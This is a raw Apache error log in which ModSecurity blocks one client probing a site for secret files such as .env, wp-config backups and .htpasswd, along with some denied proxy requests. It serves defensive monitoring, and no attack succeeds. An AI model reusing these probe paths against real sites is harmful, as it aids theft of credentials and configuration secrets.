[Mon May 11 11:58:35.695198 2026] [security2:error] [pid 1254133:tid 1254142] [client 43.156.71.177:49362] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agGoSxjZymfuKpjWXeh-9AAAAMY"], referer: http://www.tchatbooster.fr
[Mon May 11 11:59:04.574687 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:64390] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /bin/wp-config.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/bin/wp-config.bak2024"] [unique_id "agGoaJkIEwRJMyDaV55QSAAAAVA"]
[Mon May 11 11:59:04.574903 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:64390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/bin/wp-config.bak2024"] [unique_id "agGoaJkIEwRJMyDaV55QSAAAAVA"]
[Mon May 11 11:59:06.736438 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:64390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoaJkIEwRJMyDaV55QSAAAAVA"]
[Mon May 11 11:59:06.763262 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:64404] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.bak found within REQUEST_FILENAME: /bin/wp-config.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/bin/wp-config.bak2024"] [unique_id "agGoar4KNmD_mZ_vlf867gAAAFg"]
[Mon May 11 11:59:06.763689 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:64404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/bin/wp-config.bak2024"] [unique_id "agGoar4KNmD_mZ_vlf867gAAAFg"]
[Mon May 11 11:59:07.976281 2026] [security2:error] [pid 1254242:tid 1254269] [client 185.177.72.9:64404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoar4KNmD_mZ_vlf867gAAAFg"]
[Mon May 11 11:59:33.309075 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:58666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cart/.env.production2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/cart/.env.production2024"] [unique_id "agGohRjZymfuKpjWXeh_JQAAAMM"]
[Mon May 11 11:59:33.309508 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:58666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/cart/.env.production2024"] [unique_id "agGohRjZymfuKpjWXeh_JQAAAMM"]
[Mon May 11 11:59:34.457843 2026] [security2:error] [pid 1254133:tid 1254139] [client 185.177.72.9:58666] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGohRjZymfuKpjWXeh_JQAAAMM"]
[Mon May 11 11:59:34.481435 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:58682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cart/.env.production2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/cart/.env.production2024"] [unique_id "agGohr4KNmD_mZ_vlf87WwAAAEc"]
[Mon May 11 11:59:34.481645 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:58682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/cart/.env.production2024"] [unique_id "agGohr4KNmD_mZ_vlf87WwAAAEc"]
[Mon May 11 11:59:35.678672 2026] [security2:error] [pid 1254242:tid 1254252] [client 185.177.72.9:58682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGohr4KNmD_mZ_vlf87WwAAAEc"]
[Mon May 11 11:59:35.707103 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 20.206.76.148:50766] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2095/readme.php
[Mon May 11 11:59:55.174301 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:47146] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /cloud/.htpasswd.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/cloud/.htpasswd.test"] [unique_id "agGom2S6k_SCYd1AVZqwmAAAAQI"]
[Mon May 11 11:59:55.174510 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:47146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/cloud/.htpasswd.test"] [unique_id "agGom2S6k_SCYd1AVZqwmAAAAQI"]
[Mon May 11 11:59:56.326739 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:47146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGom2S6k_SCYd1AVZqwmAAAAQI"]
[Mon May 11 11:59:56.353675 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:47148] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /cloud/.htpasswd.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/cloud/.htpasswd.test"] [unique_id "agGonEYQeUtAPynIs6xamAAAAAM"]
[Mon May 11 11:59:56.354183 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:47148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/cloud/.htpasswd.test"] [unique_id "agGonEYQeUtAPynIs6xamAAAAAM"]
[Mon May 11 11:59:57.560440 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:47148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGonEYQeUtAPynIs6xamAAAAAM"]
[Mon May 11 12:00:00.093935 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:47188] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/composer.json2"] [unique_id "agGooEYQeUtAPynIs6xamwAAABI"]
[Mon May 11 12:00:00.094150 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:47188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/composer.json2"] [unique_id "agGooEYQeUtAPynIs6xamwAAABI"]
[Mon May 11 12:00:01.066747 2026] [authz_core:error] [pid 1254133:tid 1254140] [client 20.206.76.148:50766] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2095/plugins/Cache/footer.php
[Mon May 11 12:00:01.263440 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:47188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGooEYQeUtAPynIs6xamwAAABI"]
[Mon May 11 12:00:01.288775 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:47192] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/composer.json2"] [unique_id "agGooRjZymfuKpjWXeh_eQAAAMk"]
[Mon May 11 12:00:01.289535 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:47192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/composer.json2"] [unique_id "agGooRjZymfuKpjWXeh_eQAAAMk"]
[Mon May 11 12:00:02.515098 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:47192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGooRjZymfuKpjWXeh_eQAAAMk"]
[Mon May 11 12:00:20.186739 2026] [authz_core:error] [pid 1254242:tid 1254257] [client 95.111.239.37:58744] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 12:00:24.749807 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:4834] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.testing.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/config/.env.testing.sample"] [unique_id "agGouJkIEwRJMyDaV55QnwAAAUg"]
[Mon May 11 12:00:24.750395 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:4834] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/config/.env.testing.sample"] [unique_id "agGouJkIEwRJMyDaV55QnwAAAUg"]
[Mon May 11 12:00:25.932141 2026] [security2:error] [pid 1256241:tid 1256254] [client 185.177.72.9:4834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGouJkIEwRJMyDaV55QnwAAAUg"]
[Mon May 11 12:00:25.956576 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:4844] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.testing.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/config/.env.testing.sample"] [unique_id "agGouRjZymfuKpjWXeh_tQAAANM"]
[Mon May 11 12:00:25.956788 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:4844] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/config/.env.testing.sample"] [unique_id "agGouRjZymfuKpjWXeh_tQAAANM"]
[Mon May 11 12:00:27.207234 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:4844] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGouRjZymfuKpjWXeh_tQAAANM"]
[Mon May 11 12:00:28.033018 2026] [authz_core:error] [pid 1256241:tid 1256261] [client 95.111.239.37:61362] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-admin/includes/error_log, referer: binance.com
[Mon May 11 12:00:37.204794 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:10088] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /controllers/.env.dist-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/controllers/.env.dist-fix"] [unique_id "agGoxZkIEwRJMyDaV55QpQAAAVg"]
[Mon May 11 12:00:37.387138 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:10088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/controllers/.env.dist-fix"] [unique_id "agGoxZkIEwRJMyDaV55QpQAAAVg"]
[Mon May 11 12:00:38.564446 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:10088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoxZkIEwRJMyDaV55QpQAAAVg"]
[Mon May 11 12:00:38.590593 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:10094] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /controllers/.env.dist-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/controllers/.env.dist-fix"] [unique_id "agGoxpkIEwRJMyDaV55QpgAAAUw"]
[Mon May 11 12:00:38.590804 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:10094] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/controllers/.env.dist-fix"] [unique_id "agGoxpkIEwRJMyDaV55QpgAAAUw"]
[Mon May 11 12:00:39.779284 2026] [security2:error] [pid 1256241:tid 1256258] [client 185.177.72.9:10094] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoxpkIEwRJMyDaV55QpgAAAUw"]
[Mon May 11 12:01:21.980660 2026] [proxy_http:error] [pid 1254212:tid 1254230] (20014)Internal error (specific information not available): [client 5.255.124.170:52300] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.980690 2026] [proxy:error] [pid 1254212:tid 1254230] [client 5.255.124.170:52300] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
[Mon May 11 12:01:21.981900 2026] [proxy_http:error] [pid 1254133:tid 1254146] (20014)Internal error (specific information not available): [client 5.255.124.170:52350] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 12:01:21.981929 2026] [proxy:error] [pid 1254133:tid 1254146] [client 5.255.124.170:52350] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/
